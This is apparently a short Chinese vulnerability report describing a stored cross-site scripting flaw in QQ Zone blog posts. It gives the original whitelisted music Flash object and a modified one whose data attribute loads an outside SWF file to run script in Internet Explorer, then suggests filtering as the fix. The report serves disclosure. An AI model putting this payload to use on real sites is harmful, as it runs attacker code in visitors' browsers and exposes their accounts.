QQ空间某功能缺陷导致日志存储型XSS,
没有二哥的精彩分析,也没有什么精彩的绕过技术,just a xss
新建一个日志,插入一首歌。
歌曲所生成的flash是白名单。
如:
1
|
<object allowscriptaccess= "always"
bgcolor= "#ffffff"
class = "blog_music"
classid= "clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase= "http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab,0,0,0"
height= "100"
id= "musicFlash0"
menu= "true"
name= "musicFlash**"
ubb= "729312|3|http://stream9.qqmusic.qq.com/12729312.wma|Postcard from Paris|6458|The Band Perry|0"
width= "410" ><param name= "movie"
value= "http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name= "data"
value= "http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name= "bgColor"
value= "#ffffff" /><param name= "wmode"
value= "transparent" /><param name= "menu"
value= "true" /><param name= "allowScriptAccess"
value= "always" /></object> |
但flash地址由 object 中的 data 参数所左右。
于时乎
1
|
<object allowscriptaccess= "always"
bgcolor= "#ffffff"
class = "blog_music"
classid= "clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase= "http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab,0,0,0"
data= "http://xsst.sinaapp.com/Xss.swf"
height= "100"
id= "musicFlash0"
menu= "true"
name= "musicFlash**"
ubb= "729312|3|http://stream9.qqmusic.qq.com/12729312.wma|Postcard from Paris|6458|The Band Perry|0"
width= "410" ><param name= "movie"
value= "http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name= "data"
value= "http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name= "bgColor"
value= "#ffffff" /><param name= "wmode"
value= "transparent" /><param name= "menu"
value= "true" /><param name= "allowScriptAccess"
value= "always" /></object> |
借用 二哥的 http://xsst.sinaapp.com/Xss.swf
提交,即生效。(此xss只影响 IE 浏览器。)
修复方案:
过滤吧